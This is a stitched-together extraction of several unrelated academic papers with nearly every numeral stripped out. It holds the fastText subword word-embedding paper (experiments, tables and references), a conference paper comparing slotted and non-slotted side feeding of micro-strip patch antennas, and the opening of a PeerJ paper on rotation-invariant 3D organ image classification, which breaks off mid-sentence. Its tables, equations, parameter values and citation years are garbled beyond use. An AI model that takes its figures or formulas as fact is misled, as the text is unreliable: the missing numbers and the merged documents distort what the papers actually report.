baseline skipgram model, we use a linear decay of the step size. given a training set containing t words and a number of passes over the data equal to p , the step size at time t is equal to γ ( − ttp ), where γ is a fixed parameter. we carry out the optimiza- tion in parallel, by resorting to hogwild (recht et al., ). all threads share parameters and update vectors in an asynchronous manner. . implementation details for both our model and the baseline experiments, we use the following parameters: the word vectors have dimension . for each positive example, we sam- ple negatives at random, with probability propor- tional to the square root of the uni-gram frequency. we use a context window of size c, and uniformly sample the size c between and . in order to sub- sample the most frequent words, we use a rejection threshold of − (for more details, see (mikolov et al., b)). when building the word dictionary, we keep the words that appear at least times in the training set. the step size γ is set to . for the skipgram baseline and to . for both our model and the cbow baseline. these are the default values in the word vec package and work well for our model too. using this setting on english data, our model with character n-grams is approximately . × slower to train than the skipgram baseline. indeed, we process k words/second/thread versus k words/second/thread for the baseline. our model is implemented in c++, and is publicly available. . datasets except for the comparison to previous work (sec. . ), we train our models on wikipedia data. we downloaded wikipedia dumps in nine languages: arabic, czech, german, english, https://code.google.com/archive/p/word vec https://github.com/facebookresearch/fasttext https://dumps.wikimedia.org spanish, french, italian, romanian and russian. we normalize the raw wikipedia data using matt mahoney’s pre-processing perl script. all the datasets are shuffled, and we train our models by doing five passes over them. results we evaluate our model in five experiments: an eval- uation of word similarity and word analogies, a com- parison to state-of-the-art methods, an analysis of the effect of the size of training data and of the size of character n-grams that we consider. we will de- scribe these experiments in detail in the following sections. . human similarity judgement we first evaluate the quality of our representations on the task of word similarity / relatedness. we do so by computing spearman’s rank correlation co- efficient (spearman, ) between human judge- ment and the cosine similarity between the vector representations. for german, we compare the dif- ferent models on three datasets: gur , gur and zg (gurevych, ; zesch and gurevych, ). for english, we use the ws dataset in- troduced by finkelstein et al. ( ) and the rare word dataset (rw), introduced by luong et al. ( ). we evaluate the french word vectors on the translated dataset rg (joubarne and inkpen, ). spanish, arabic and romanian word vectors are evaluated using the datasets described in (hassan and mihalcea, ). russian word vectors are eval- uated using the hj dataset introduced by panchenko et al. ( ). we report results for our method and baselines for all datasets in table . some words from these datasets do not appear in our training data, and thus, we cannot obtain word representation for these words using the cbow and skipgram baselines. in order to provide comparable results, we propose by default to use null vectors for these words. since our model exploits subword information, we can also compute valid representations for out-of-vocabulary words. we do so by taking the sum of its n-gram vectors. when oov words are represented using http://mattmahoney.net/dc/textdata sg cbow sisg- sisg ar ws de gur gur zg en rw ws es ws fr rg ro ws ru hj table : correlation between human judgement and similarity scores on word similarity datasets. we train both our model and the word vec baseline on normalized wikipedia dumps. evaluation datasets contain words that are not part of the training set, so we represent them using null vectors (sisg-). with our model, we also compute vectors for unseen words by summing the n-gram vectors (sisg). null vectors we refer to our method as sisg- and sisg otherwise (subword information skip gram). first, by looking at table , we notice that the pro- posed model (sisg), which uses subword informa- tion, outperforms the baselines on all datasets except the english ws dataset. moreover, computing vectors for out-of-vocabulary words (sisg) is al- ways at least as good as not doing so (sisg-). this proves the advantage of using subword information in the form of character n-grams. second, we observe that the effect of using char- acter n-grams is more important for arabic, ger- man and russian than for english, french or span- ish. german and russian exhibit grammatical de- clensions with four cases for german and six for russian. also, many german words are compound words; for instance the nominal phrase “table ten- nis” is written in a single word as “tischtennis”. by exploiting the character-level similarities between “tischtennis” and “tennis”, our model does not rep- resent the two words as completely different words. finally, we observe that on the english rare words dataset (rw), our approach outperforms the sg cbow sisg cs semantic . . . syntactic . . . de semantic . . . syntactic . . . en semantic . . . syntactic . . . it semantic . . . syntactic . . . table : accuracy of our model and baselines on word analogy tasks for czech, german, english and italian. we report results for semantic and syntactic analogies separately. baselines while it does not on the english ws dataset. this is due to the fact that words in the en- glish ws dataset are common words for which good vectors can be obtained without exploiting subword information. when evaluating on less fre- quent words, we see that using similarities at the character level between words can help learning good word vectors. . word analogy tasks we now evaluate our approach on word analogy questions, of the form a is to b as c is to d, where d must be predicted by the models. we use the datasets introduced by mikolov et al. ( a) for english, by svoboda and brychcin ( ) for czech, by köper et al. ( ) for german and by berardi et al. ( ) for italian. some questions con- tain words that do not appear in our training corpus, and we thus excluded these questions from the eval- uation. we report accuracy for the different models in table . we observe that morphological informa- tion significantly improves the syntactic tasks; our approach outperforms the baselines. in contrast, it does not help for semantic questions, and even degrades the performance for german and italian. note that this is tightly related to the choice of the length of character n-grams that we consider. we show in sec. . that when the size of the n-grams is chosen optimally, the semantic analogies degrade de en es fr gur zg ws rw ws rg luong et al. ( ) - - - - qiu et al. ( ) - - - - soricut and och ( ) sisg botha and blunsom ( ) sisg table : spearman’s rank correlation coefficient between human judgement and model scores for different methods using morphology to learn word representations. we keep all the word pairs of the evaluation set and obtain representations for out-of-vocabulary words with our model by summing the vectors of character n-grams. our model was trained on the same datasets as the methods we are comparing to (hence the two lines of results for our approach). less. another interesting observation is that, as ex- pected, the improvement over the baselines is more important for morphologically rich languages, such as czech and german. . comparison with morphological representations we also compare our approach to previous work on word vectors incorporating subword information on word similarity tasks. the methods used are: the recursive neural network of luong et al. ( ), the morpheme cbow of qiu et al. ( ) and the morphological transformations of soricut and och ( ). in order to make the results comparable, we trained our model on the same datasets as the meth- ods we are comparing to: the english wikipedia data released by shaoul and westbury ( ), and the news crawl data from the wmt shared task for german, spanish and french. we also compare our approach to the log-bilinear language model introduced by botha and blunsom ( ), which was trained on the europarl and news com- mentary corpora. again, we trained our model on the same data to make the results comparable. us- ing our model, we obtain representations of out-of- vocabulary words by summing the representations of character n-grams. we report results in table . we observe that our simple approach performs well relative to techniques based on subword information obtained from morphological segmentors. we also observe that our approach outperforms the soricut and och ( ) method, which is based on prefix and suffix analysis. the large improvement for ger- man is due to the fact that their approach does not model noun compounding, contrary to ours. . effect of the size of the training data since we exploit character-level similarities between words, we are able to better model infrequent words. therefore, we should also be more robust to the size of the training data that we use. in order to as- sess that, we propose to evaluate the performance of our word vectors on the similarity task as a func- tion of the training data size. to this end, we train our model and the cbow baseline on portions of wikipedia of increasing size. we use the wikipedia corpus described above and isolate the first , , , , , and percent of the data. since we don’t reshuffle the dataset, they are all subsets of each other. we report results in fig. . as in the experiment presented in sec. . , not all words from the evaluation set are present in the wikipedia data. again, by default, we use a null vector for these words (sisg-) or compute a vec- tor by summing the n-gram representations (sisg). the out-of-vocabulary rate is growing as the dataset shrinks, and therefore the performance of sisg- and cbow necessarily degrades. however, the pro- posed model (sisg) assigns non-trivial vectors to previously unseen words. first, we notice that for all datasets, and all sizes, the proposed approach (sisg) performs better than percentage of data sp e a rm a n r a n k cbow sisg- sisg (a) de-gur percentage of data sp e a rm a n r a n k cbow sisg- sisg (b) en-rw figure : influence of size of the training data on performance. we compute word vectors following the proposed model using datasets of increasing size. in this experiment, we train models on a fraction of the full wikipedia dump. the baseline. however, the performance of the base- line cbow model gets better as more and more data is available. our model, on the other hand, seems to quickly saturate and adding more data does not always lead to improved results. second, and most importantly, we notice that the proposed approach provides very good word vectors even when using very small training datasets. for in- stance, on the german gur dataset, our model (sisg) trained on % of the data achieves better performance ( ) than the cbow baseline trained on the full dataset ( ). on the other hand, on the en- glish rw dataset, using % of the wikipedia corpus we achieve a correlation coefficient of which is better than the performance of cbow trained on the full dataset ( ). this has a very important practi- cal implication: well performing word vectors can be computed on datasets of a restricted size and still work well on previously unseen words. in gen- eral, when using vectorial word representations in specific applications, it is recommended to retrain the model on textual data relevant for the applica- tion. however, this kind of relevant task-specific data is often very scarce and learning from a reduced amount of training data is a great advantage. . effect of the size of n-grams the proposed model relies on the use of character n- grams to represent words as vectors. as mentioned in sec. . , we decided to use n-grams ranging from to characters. this choice was arbitrary, moti- vated by the fact that n-grams of these lengths will cover a wide range of information. they would in- clude short suffixes (corresponding to conjugations and declensions for instance) as well as longer roots. in this experiment, we empirically check for the in- fluence of the range of n-grams that we use on per- formance. we report our results in table for en- glish and german on word similarity and analogy datasets. we observe that for both english and german, our arbitrary choice of - was a reasonable deci- sion, as it provides satisfactory performance across languages. the optimal choice of length ranges depends on the considered task and language and should be tuned appropriately. however, due to the scarcity of test data, we did not implement any proper validation procedure to automatically select the best parameters. nonetheless, taking a large range such as − provides a reasonable amount of subword information. this experiment also shows that it is important to include long n-grams, as columns corresponding to n ≤ and n ≤ work best. this is especially true for german, as many nouns are compounds made up from several units that can only be captured by longer character sequences. on analogy tasks, we observe that using larger n-grams helps for seman- tic analogies. however, results are always improved by taking n ≥ rather than n ≥ , which shows that character -grams are not informative for that task. as described in sec. . , before computing (a) de-gur (b) de semantic (c) de syntactic (d) en-rw (e) en semantic (f) en syntactic table : study of the effect of sizes of n-grams considered on performance. we compute word vectors by using character n-grams with n in {i, . . . ,j} and report performance for various values of i and j. we eval- uate this effect on german and english, and represent out-of-vocabulary words using subword information. character n-grams, we prepend and append special positional characters to represent the beginning and end of word. therefore, -grams will not be enough to properly capture suffixes that correspond to con- jugations or declensions, since they are composed of a single proper character and a positional one. . language modeling in this section, we describe an evaluation of the word vectors obtained with our method on a language modeling task. we evaluate our language model on five languages (cs, de, es, fr, ru) using the datasets introduced by botha and blunsom ( ). each dataset contains roughly one million training tokens, and we use the same preprocessing and data splits as botha and blunsom ( ). our model is a recurrent neural network with lstm units, regularized with dropout (with proba- bility of . ) and weight decay (regularization pa- rameter of − ). we learn the parameters using the adagrad algorithm with a learning rate of . , clipping the gradients which have a norm larger than . . we initialize the weight of the network in the range [− . , . ], and use a batch size of . two baselines are considered: we compare our ap- proach to the log-bilinear language model of botha and blunsom ( ) and the character aware lan- guage model of kim et al. ( ). we trained word vectors with character n-grams on the training set of the language modeling task and use them to ini- tialize the lookup table of our language model. we report the test perplexity of our model without using pre-trained word vectors (lstm), with word vectors pre-trained without subword information (sg) and with our vectors (sisg). the results are presented in table . we observe that initializing the lookup table of the language model with pre-trained word represen- tations improves the test perplexity over the base- line lstm. the most important observation is that using word representations trained with subword in- formation outperforms the plain skipgram model. we observe that this improvement is most signifi- cant for morphologically rich slavic languages such as czech ( % reduction of perplexity over sg) and russian ( % reduction). the improvement is less significant for roman languages such as spanish ( % reduction) or french ( % reduction). this shows the importance of subword information on the language modeling task and exhibits the usefulness cs de es fr ru vocab. size k k k k k clbl canlm lstm sg sisg table : test perplexity on the language modeling task, for different languages. we compare to two state of the art approaches: clbl refers to the work of botha and blunsom ( ) and canlm refers to the work of kim et al. ( ). of the vectors that we propose for morphologically rich languages. qualitative analysis . nearest neighbors. we report sample qualitative results in table . for selected words, we show nearest neighbors accord- ing to cosine similarity for vectors trained using the proposed approach and for the skipgram base- line. as expected, the nearest neighbors for com- plex, technical and infrequent words using our ap- proach are better than the ones obtained using the baseline model. . character n-grams and morphemes we want to qualitatively evaluate whether or not the most important n-grams in a word correspond to morphemes. to this end, we take a word vector that we construct as the sum of n-grams. as de- scribed in sec. . , each word w is represented as the sum of its n-grams: uw = ∑ g∈gw zg. for each n-gram g, we propose to compute the restricted rep- resentation uw\g obtained by omitting g: uw\g = ∑ g′∈g−{g} zg′. we then rank n-grams by increasing value of cosine between uw and uw\g. we show ranked n-grams for selected words in three languages in table . for german, which has a lot of compound nouns, we observe that the most important n-grams cor- word n-grams autofahrer fahr fahrer auto freundeskreis kreis kreis> <freun de grundwort wort wort> grund sprachschule schul hschul sprach tageslicht licht gesl tages anarchy chy <anar narchy monarchy monarc chy <monar kindness ness> ness kind politeness polite ness> eness> en unlucky <un cky> nlucky lifetime life <life time starfish fish fish> star submarine marine sub marin transform trans <trans form finirais ais> nir fini fr finissent ent> finiss <finis finissions ions> finiss sions> table : illustration of most important character n- grams for selected words in three languages. for each word, we show the n-grams that, when re- moved, result in the most different representation. respond to valid morphemes. good examples in- clude autofahrer (car driver) whose most important n-grams are auto (car) and fahrer (driver). we also observe the separation of compound nouns into mor- phemes in english, with words such as lifetime or starfish. however, for english, we also observe that n-grams can correspond to affixes in words such as kindness or unlucky. interestingly, for french we ob- serve the inflections of verbs with endings such as ais>, ent> or ions>. . word similarity for oov words as described in sec. . , our model is capable of building word vectors for words that do not appear in the training set. for such words, we simply aver- age the vector representation of its n-grams. in or- der to assess the quality of these representations, we analyze which of the n-grams match best for oov words by selecting a few word pairs from the en- glish rw similarity dataset. we select pairs such that one of the two words is not in the training vo- cabulary and is hence only represented by its n- grams. for each pair of words, we display the cosine similarity between each pair of n-grams that appear query tiling tech-rich english-born micromanaging eateries dendritic sisg tile tech-dominated british-born micromanage restaurants dendrite flooring tech-heavy polish-born micromanaged eaterie dendrites sg bookcases technology-heavy most-capped defang restaurants epithelial built-ins .ixic ex-scotland internalise delis p table : nearest neighbors of rare words using our representations and skipgram. these hand picked examples are for illustration. figure : illustration of the similarity between character n-grams in out-of-vocabulary words. for each pair, only one word is oov, and is shown on the x axis. red indicates positive cosine, while blue negative. in the words. in order to simulate a setup with a larger number of oov words, we use models trained on % of the wikipedia data as in sec. . . the re- sults are presented in fig. . we observe interesting patterns, showing that sub- words match correctly. indeed, for the word chip, we clearly see that there are two groups of n-grams in microcircuit that match well. these roughly cor- respond to micro and circuit, and n-grams in be- tween don’t match well. another interesting ex- ample is the pair rarity and scarceness. indeed, scarce roughly matches rarity while the suffix -ness matches -ity very well. finally, the word preado- lescent matches young well thanks to the -adolesc- subword. this shows that we build robust word rep- resentations where prefixes and suffixes can be ig- nored if the grammatical form is not found in the dictionary. conclusion in this paper, we investigate a simple method to learn word representations by taking into account subword information. our approach, which incor- porates character n-grams into the skipgram model, is related to an idea that was introduced by schütze ( ). because of its simplicity, our model trains fast and does not require any preprocessing or super- vision. we show that our model outperforms base- lines that do not take into account subword informa- tion, as well as methods relying on morphological analysis. we will open source the implementation of our model, in order to facilitate comparison of fu- ture work on learning subword representations. acknowledgements we thank marco baroni, hinrich schütze and the anonymous reviewers for their insightful comments. references andrei alexandrescu and katrin kirchhoff. . fac- tored neural language models. in proc. naacl. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by model- ing characters instead of words with lstms. in proc. emnlp. marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . giacomo berardi, andrea esuli, and diego marcheg- giani. . word embeddings go to italy: a com- parison of models and training datasets. italian infor- mation retrieval workshop. piotr bojanowski, armand joulin, and tomáš mikolov. . alternative structures for character-level rnns. in proc. iclr. jan a. botha and phil blunsom. . compositional morphology for word representations and language modelling. in proc. icml. xinxiong chen, lei xu, zhiyuan liu, maosong sun, and huanbo luan. . joint learning of character and word embeddings. in proc. ijcai. grzegorz chrupała. . normalizing tweets with edit scripts and recurrent neural embeddings. in proc. acl. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proc. icml. ryan cotterell and hinrich schütze. . morphologi- cal word-embeddings. in proc. naacl. qing cui, bin gao, jiang bian, siyu qiu, hanjun dai, and tie-yan liu. . knet: a general frame- work for learning word embedding using morpholog- ical knowledge. acm transactions on information systems, ( ): : – : . scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): – . cicero nogueira dos santos and maira gatti. . deep convolutional neural networks for sentiment analysis of short texts. in proc. coling. cicero nogueira dos santos and bianca zadrozny. . learning character-level representations for part-of- speech tagging. in proc. icml. lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the concept revisited. in proc. www. alex graves. . generating sequences with recurrent neural networks. arxiv preprint arxiv: . . iryna gurevych. . using the structure of a concep- tual network in computing semantic relatedness. in proc. ijcnlp. zellig s harris. . distributional structure. word, ( - ): – . samer hassan and rada mihalcea. . cross-lingual semantic relatedness using encyclopedic knowledge. in proc. emnlp. colette joubarne and diana inkpen. . comparison of semantic similarity for different languages using the google n-gram corpus and second-order co-occurrence measures. in proc. canadian conference on artificial intelligence. yoon kim, yacine jernite, david sontag, and alexan- der m rush. . character-aware neural language models. in proc. aaai. maximilian köper, christian scheible, and sabine schulte im walde. . multilingual reliability and “semantic” structure of continuous word spaces. proc. iwcs . angeliki lazaridou, marco marelli, roberto zamparelli, and marco baroni. . compositionally derived representations of morphologically complex words in distributional semantics. in proc. acl. wang ling, chris dyer, alan w. black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proc. emnlp. kevin lund and curt burgess. . producing high-dimensional semantic spaces from lexical co- occurrence. behavior research methods, instruments, & computers, ( ): – . minh-thang luong and christopher d. manning. . achieving open vocabulary neural machine translation with hybrid word-character models. in proc. acl. thang luong, richard socher, and christopher d. man- ning. . better word representations with recur- sive neural networks for morphology. in proc. conll. tomáš mikolov, ilya sutskever, anoop deoras, hai-son le, stefan kombrink, and jan černocký. . sub- word language modeling with neural networks. tech- nical report, faculty of information technology, brno university of technology. tomáš mikolov, kai chen, greg d. corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomáš mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in adv. nips. alexander panchenko, dmitry ustalov, nikolay arefyev, denis paperno, natalia konstantinova, natalia loukachevitch, and chris biemann. . hu- man and machine judgements for russian semantic relatedness. in proc. aist. siyu qiu, qing cui, jiang bian, bin gao, and tie-yan liu. . co-learning of word representations and morpheme representations. in proc. coling. benjamin recht, christopher re, stephen wright, and feng niu. . hogwild: a lock-free approach to parallelizing stochastic gradient descent. in adv. nips. david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . neurocomputing: foundations of research. chapter learning representations by back- propagating errors, pages – . mit press. haşim sak, murat saraclar, and tunga gungör. . morphology-based and sub-word language modeling for turkish speech recognition. in proc. icassp. hinrich schütze. . dimensions of meaning. in proc. ieee conference on supercomputing. hinrich schütze. . word space. in adv. nips. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proc. acl. cyrus shaoul and chris westbury. . the westbury lab wikipedia corpus. radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in proc. naacl. charles spearman. . the proof and measurement of association between two things. the american jour- nal of psychology, ( ): – . henning sperr, jan niehues, and alexander waibel. . letter n-gram-based input encoding for contin- uous space language models. in proc. of the workshop on continuous vector space models and their compo- sitionality at acl. ilya sutskever, james martens, and geoffrey e hinton. . generating text with recurrent neural networks. in proc. icml. lukáš svoboda and tomáš brychcin. . new word analogy corpus for exploring embeddings of czech words. in proc. cicling. peter d. turney, patrick pantel, et al. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . john wieting, mohit bansal, kevin gimpel, and karen livescu. . charagram: embedding words and sentences via character n-grams. in proc. emnlp. torsten zesch and iryna gurevych. . automatically creating datasets for measures of semantic relatedness. in proc. workshop on linguistic distances. xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text clas- sification. in adv. nips. paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the comparison on the side feed mode of micro-strip patch wen dang department of communication and information xi'an technology university lane , yanta road, beilin district, xian, china e-mail: @ .com xinliang liu department of communication and information xi'an technology university lane , yanta road, beilin district, xian, china e-mail: @qq.com abstract—the feeding of the micro-strip patch is flexible and complex, especially side feeding. in this paper, a single micro- strip patch antenna with a center frequency of . ghz is taken as an example to explore the performance of the slotted feed and non-slotted feed and verified in hfss . . combined with hfss . software simulation and theoretical calculation, the corresponding conclusions can be obtained. the theoretical value and simulation results will be shown that: the required / converter sizes of the non-slotted side feed and slotted side feed are different. by contrasting with sizes of two feeding modes, electrical size of the slotted feed is smaller. it can be known that all performances of the slotted feed are more superior. keywords-hfss simulation; micro-strip patch; side-feed; slot; matching i. introduction antenna is a necessary component for radiating and receiving radio waves in engineering systems such as wireless communications, radio and television, navigation, satellite, radar and other engineering systems. the micro- strip patch is simple and easy to plastic, its feeding modes are flexible and changeable. the stability of the antenna can be also affected by micro-strip patch feeding mode. the different feeding mode has different properties. the design of the feeding system determines the current distribution of the radiation patch. the more consistent the current direction is, the higher the gain is, the greater the energy is, and the better the directivity is [ ]. therefore, in an antenna system, it is especially important that how the feeding system should design, which determines the stability of the system and the quality of microwave devices. in this paper, two different side feed modes of the radiation patch are analyzed and compared. by simulating the cell structure of the micro-strip patch antenna with the center frequency f at . ghz in hfss . , the corresponding sizes of the / impedance converter and intrinsic impedance are different, when the feeding position is not the same place, which has been validated in hfss . . the mode following the theoretical sizes calculated by given equations is simulated in hfss . . the simulation results have been drawn the followings. for the non-slotted side feed, the radiation impedance is caused by the edge impedance of the patch. the theoretical calculated / converter has a large error between the length and width values. to achieve the minimum s at the center frequency, it is necessary to optimize the micro-strip line parameters for several times. for the slotted side feed, the radiation impedance is produced by the edge impedance of the patch and the edge impedance of the groove. the theoretical value of the / converter has a higher accuracy. the best performance of the center frequency can be achieved by adjusting the width and depth of the slotted feeding. based on the above conditions, the minimum value of the antenna s can be obtained, the smaller the reflection energy is, the greater the transmission efficiency is. ii. design and analysis of radiation patch unit in this paper, the radiation patch of the center frequency f = . ghz would be used as an example, the thickness h of the substrate with rogers is . mm, its dielectric constant is . . according to the formula ( ) – ( ) [ ] - [ ] , it can be obtained that the width w, length l were mm and . mm respectively, as well as the input impedance. the width w of radiation patch is the following:          r f c w   where c is the speed of free space wave. taking into account the edge shortening effect, the actual length l of the radiation patch should be expressed as: l f c l e    where e  is the effective permittivity, l is the length of the equivalent radiation gap, they can be calculated by using the following formulas respectively. e             w h rr    international conference on sensor network and computer engineering (icsnce )       . . . . . e    hw hw hl e    the input impedance can be obtained as following:    )(cos z g zy in    where g is the radiation conductance, β is the phase constant in the medium, and z is the distance from the feed point to the radiation patch edge. it can be concluded that the different input impedance can be obtained by selecting different feeding point positions. a. radiation patch unit the length and width of the radiation patch can be calculated by formulas ( )-( ). the edge impedance of the radiation patch can be obtained by formula ( ). the length and width of the / impendence converter can be known by the edge impedance. the width and length of the Ω intrinsic impedance can be also counted. according to the optimum sizes, the model can be built in hfss . shown in fig. . the size of the slotted micro-strip patch can be also calculated by the same method. the optimum sizes can be obtained after many optimizations, it can be built in hfss . shown in fig. . figure . slotted patch antenna after hfss . simulation, the results are obtained in tableⅠ. the simulation results obtained by the two feeding methods are basically the same. the theoretical sizes of the slotted feed is closer to the simulated ones, even almost identical, and its electrical size is smaller. when optimizing in the way of the slotted feed, the workloads can be greatly reduced and the efficiency can be improved. b. verification in order to verify the rationality of the above conclusions, the input port can be excited by the wave port with a Ω load. when the width of the micro-strip line is w and the medium thickness is h, the height of the wave port is generally set to ~ h. when there is w >h, the width of the wave port is set to w . when there is w <h, the width of the wave port is generally set to w or ~ h [ ]. according to the rules, it can be built and verified in hfss . . the size and impedance of each port are shown in tableⅠ. from tableⅠ, it can be seen that the impedance value can be directly gotten by adding wave-port excitation for the converter as the input impedance, after running in hfss . . the slotted feed mode is closer to the theoretical value than the non-slotted feed mode. thus, the slotted feed mode can improve the efficiency of the operation and reduce the workload. c. comparison and new discoveries of two feed modes in the micro-strip feed, the return loss can be affected by the size of the / converter. the reflected voltage wave in the circuit can be reduced by proper using the / converter, the loss can be also reduced. the different performances of slotted and non-slotted feed are shown in tableⅠ. . mm mm mm mm mm mm figure . no slotted patch antenna . mm . mm mm mm mm . m m m figure . slotted patch antenna international conference on sensor network and computer engineering (icsnce ) table i. comparison between the slotted and non-slotted feeding ( unit: mm ) the slotted the non-slotted optimization optimization calculation the length of patch . . . the wide of patch . the port of / converter length . . wide . . impedance . Ω . Ω . Ω the port of Ω length . . Ω wide impedance . Ω . Ω Ω substrate thickness h . . . the wide of the slotted the length of the slotted s - . db - . db gain . db . db size mm . mm bandwidth . % . % reduction % from tableⅠ, it can be concluded that the electrical size of the slotted feed is slightly smaller than the electrical size of the non-slotted feed, in that case where the return loss, the gain and bandwidth of the same patch are substantially consistent. the theoretical value of the slotted feed size is closer to the optimum value. therefore, when the micro-strip arrays are formed, the advantages of the slotted feed are more obvious. iii. conclusion according to comparison and analysis of the simulation results of the two feeding methods, the following conclusions can be drawn: the value of the s is closely related with the size of the micro-strip line, especially the width of the micro-strip line. the impact of the width play important role, the center frequency and the ideal value can be coincident by adjusting the width. the value of s can be made better by adjusting the length, so that the feed network can achieve full match. the / converter ( z ) of the non-slotted feed is determined by the micro-strip characteristic impedance (zl) and the edge impedance (zl) of the patch. similarly, the edge impedance of the slotted feed patch is mainly caused by the edge of the slot and the radiation patch. the edge impedance and micro-strip line impedance can be calculated in hfss . by directly adding wave port excitation. after calculation, the impedance z values can be gotten as shown in tableⅠ. in short, all performances of the slotted feed are better than ones of the non-slotted feed. in the feed mode selection, the slotted feed is a relatively stable feeding method. iv. the development prospect and significance in the paper, by comparing the performances of two different feeding methods[ ], it could been seen that performances of all aspects of slotted feed are even better. when the slotted feed is matched, the theoretical value is more accurate without too much optimization, saving a lot of time and improving the simulation efficiency, which provides a good foundation for the micros-trip antenna array. the slotted radiation patch reduces the electrical size of the patch greatly, so that the antenna structure is more compact and miniaturization. this will be the future development tendency of micro-strip antennas. today, micro-strip theory is mature and widely used. with the wide application and great development of micro- strip antenna in the fields of satellite communication [ ], millimeter-wave [ ] and mobile communication, the research of micro-strip planar antenna technology [ ] will become one of the hotspots in future antenna research. at present, the compact profile of the antenna is a welcomed developed tendency [ ] - [ ]. the sizes of the radiation patch, whether it is as a unit patch micro-strip antenna, or as the array antenna unit array, affect the antenna resonance point and other performances. stable basic unit structure will be provided broadband for the micro-strip patch as good foundation. acknowledgement i would like to thank all my teachers who have helped me to develop the fundamental and essential academic competence. my sincere appreciation also goes to all the teachers and students who helped me. references [ ] s. l. s. yang, k. f. lee, and a. a. kishk, “ design and study of wideband signal feed circularity polarized microstrip antenna, ” progress in electromagnetics research, pier , – , international conference on sensor network and computer engineering (icsnce ) [ ] huynh, t. and k. f. lee, “single-layer single-patch wideband microstrip antenna,” electron. lett., vol. , no. , – , aug. . [ ] bhalla, r. and l. shafai, “resonance behavior of single u-slot microstrip patch antenna,” microwave and optical technology letters, vol. , no. , – , march . [ ] z. pi and f. khan, “an introduction to millimeter-wave mobile broadband systems,” ieee commun. mag., vol. , no. , pp. – , jun. . [ ] e. arnieri, l. boccia, g. amendola, and g. di massa, “a compact high gain antenna for small satellite applications,” ieee trans. antennas propag., vol. , no. , pp. – , feb. . [ ] k. l. wong, compact and broadband microstrip antennas. hoboken, nj: wiley, . [ ] s. k. podilchak, m. caillet, d. lee, y. m. m. antar, l. chu, m. hammar, d. caldwell, and e. barron, “a compact circularly polarized antenna using anarray of folded-shorted patches,” ieee trans. antennas propagation, vol. , no. , pp. – , sept. . [ ] li mingyang. liu yang.design of hfss antenna [m]. beijing: electronic industry press, . [ ] john klaus• antenna (third edition, volume ) [m]. beijing: electronic industry press, . [ ] deng weibo. analysis of characteristics of high frequency monopole antenna on dielectric plane [j]. journal of electronics & information technology, , ( ). [ ] li xiangqiang. liu qingxiang. zhao liu.et. -ring -element high power radial line helical array antenna. high power laser and partiacl beams. . ( ): - . submitted november accepted february published march corresponding author kh tohidul islam, kh.tohidulislam@gmail.com academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright islam et al. distributed under creative commons cc-by . open access a rotation and translation invariant method for d organ image classification using deep convolutional neural networks kh tohidul islam, sudanthi wijewickrema and stephen o’leary department of surgery (otolaryngology), university of melbourne, melbourne, victoria, australia abstract three-dimensional ( d) medical image classification is useful in applications such as disease diagnosis and content-based medical image retrieval. it is a challenging task due to several reasons. first, image intensity values are vastly different depending on the image modality. second, intensity values within the same image modality may vary depending on the imaging machine and artifacts may also be introduced in the imaging process. third, processing d data requires high computational power. in recent years, significant research has been conducted in the field of d medical image classification. however, most of these make assumptions about patient orientation and imaging direction to simplify the problem and/or work with the full d images. as such, they perform poorly when these assumptions are not met. in this paper, we propose a method of classification for d organ images that is rotation and translation invariant. to this end, we extract a representative two-dimensional ( d) slice along the plane of best symmetry from the d image. we then use this slice to represent the d image and use a -layer deep convolutional neural network (dcnn) to perform the classification task. we show experimentally, using multi-modal data, that our method is comparable to existing methods when the assumptions of patient orientation and viewing direction are met. notably, it shows similarly high accuracy even when these assumptions are violated, where other methods fail. we also explore how this method can be used with other dcnn models as well as conventional classification approaches. subjects artificial intelligence, computer vision, data mining and machine learning keywords deep learning, medical image processing, image classification, symmetry, d organ image classification introduction with the rapid growth of medical imaging technologies, a large volume of d medical images of different modalities such as magnetic resonance imaging (mri), computed tomography (ct), and positron emission tomography (pet) has become available (research & markets, ). this has resulted in the formation of large medical image databases that offer opportunities for evidence-based diagnosis, teaching, and research. within this context, the need for the development of d image classification methods has risen. for example, d medical image classification is used in applications how to cite this article islam kt, wijewickrema s, o’leary s. . a rotation and translation invariant method for d organ image classification using deep convolutional neural networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:kh.tohidulislam@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. such as computer aided diagnosis (cad) and content-based medical image retrieval (cbmir) (zhou et al., ; kumar et al., ). in recent years, many algorithms have been introduced for the classification of d medical images (arias et al., ; mohan & subashini, ). both conventional classification methods and deep learning have been used for this purpose. for example, Öziç & Özşen ( ) proposed a voxel-based morphometry method to transform d voxel values into a vector to be used as features in a support vector machine (svm) in order to identify patients with alzheimer’s disease using mr images. bicacro, silveira & marques ( ) investigated the classification of d brain pet images into three classes: alzheimer’s disease, mild cognitive impairment, and cognitively normal. to this end, they used three different feature extraction approaches (volumetric intensity, d haar-like (cui et al., ), and histogram of oriented gradients (hog) (dalal & triggs, )) and trained a svm using these features. morgado, silveira & marques ( ) also performed a similar classification (alzheimer’s disease, mild cognitive impairment, and cognitively normal) for pet brain images. they used d and d local binary patterns as texture descriptors to extract features and performed the classification task using a svm. a d image classification method was proposed by liu & dellaert 